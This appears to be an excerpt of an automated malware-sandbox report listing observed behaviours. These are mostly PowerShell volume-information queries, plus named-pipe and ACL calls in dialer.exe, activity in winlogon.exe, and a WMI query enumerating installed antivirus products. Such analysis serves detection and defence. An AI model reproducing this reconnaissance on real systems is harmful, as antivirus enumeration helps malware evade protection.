Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\dialer.exe Code function: 4_2_00007FF78AB31C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW, 4_2_00007FF78AB31C64
Source: C:\Windows\System32\winlogon.exe Code function: 7_2_00000225DC647A40 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 7_2_00000225DC647A40
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct